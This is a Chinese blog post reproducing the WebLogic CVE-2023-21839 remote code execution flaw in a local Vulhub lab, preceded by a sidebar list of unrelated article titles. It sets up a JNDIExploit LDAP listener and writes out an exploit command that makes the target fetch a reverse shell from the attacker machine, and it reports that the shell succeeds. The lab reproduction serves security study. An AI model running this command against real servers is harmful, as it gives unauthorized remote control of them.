- 1C++核心编程--函数的重载_c++ 函数返回值作为重载条件
- 2opencv-python库 cv2图像二值化详解_python opencv 二值化
- 3用SQL语句删除数据库重复数据,只保留一条有效数据_sql删除重复数据只保留一条
- 4CentOS7安装Docker(yum方式)
- 5一小时搞定Git(含盖IDEA、VsCode使用)_在vscode有类似于idea的git界面吗
- 62023年最新PyCharm安装详细教程及pycharm配置_pycharm2023_pycharm2023 的终端
- 7【头歌·计组·自己动手画CPU】五、单总线CPU设计(理论版) 【计算机硬件系统设计】_单总线cpu设计(定长指令周期3级时序)
- 8类k-均值算法无法解决非簇状分布的数据聚类问题_一种新的原型聚类方法:K-multiple-means...
- 9LoRa模块在智能灌溉系统中的应用特点介绍
- 10Linux安全与高级应用(三)深入探索MySQL数据库:安装、管理与安全实践
【漏洞复现】Weblogic CVE-2023-21839
赞
踩
一、漏洞简介
1. 产品简介
WebLogic是Oracle公司研发的用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器,在全球范围内被广泛使用。
2. 漏洞简介
Oracle发布安全公告,修复了一个存在于WebLogic Core中的远程代码执行漏洞(CVE-2023-21839),可在未经身份验证的情况下通过T3、IIOP协议远程访问并破坏易受攻击的WebLogic Server,成功利用该漏洞可能导致未授权访问和敏感信息泄露。
3. 危害等级
高危
4. 影响范围
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0
二、复现环境
靶机(搭建的Vulhub漏洞测试靶场):192.168.15.15
攻击机(kali):192.168.15.131
Vulhub漏洞测试靶场的搭建可参考:Vulhub漏洞测试靶场搭建
三、复现过程
1. 启动漏洞环境
使用Vulhub启动漏洞环境
2. 验证漏洞环境
访问链接:http://192.168.15.15:7001/console/login/LoginForm.jsp 即可访问到后台管理登录界面,出现以下界面证明环境搭建成功。
3. 漏洞复现
用到的两个工具:JNDIExploit-1.2-SNAPSHOT.jar、CVE-2023-21839
第一步:使用工具JNDIExploit-1.2-SNAPSHOT.jar在kali上设置监听:
第二步:打开kali监听端口
第三步:使用CVE-2023-21839工具来进行攻击测试(将工具上传至kali进行编译,然后再执行)
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 192.168.15.15 -port 7001 -ldap ldap://192.168.15.131:1389/Basic/ReverseShell/192.168.15.131/6666
- 1
- 2
- 3
第一次执行报错 提示 Exception in thread "LDAPListener client connection reader for connection from 的错误。解决方法:需要去下载对应服务器版本的java的版本。
安装jdk1.8.0.202后再次执行(不知道如何安装java的可以参考:java安装步骤)
第四步:成功反弹shell
最后一步:复现之后别忘记及时关闭漏洞环境
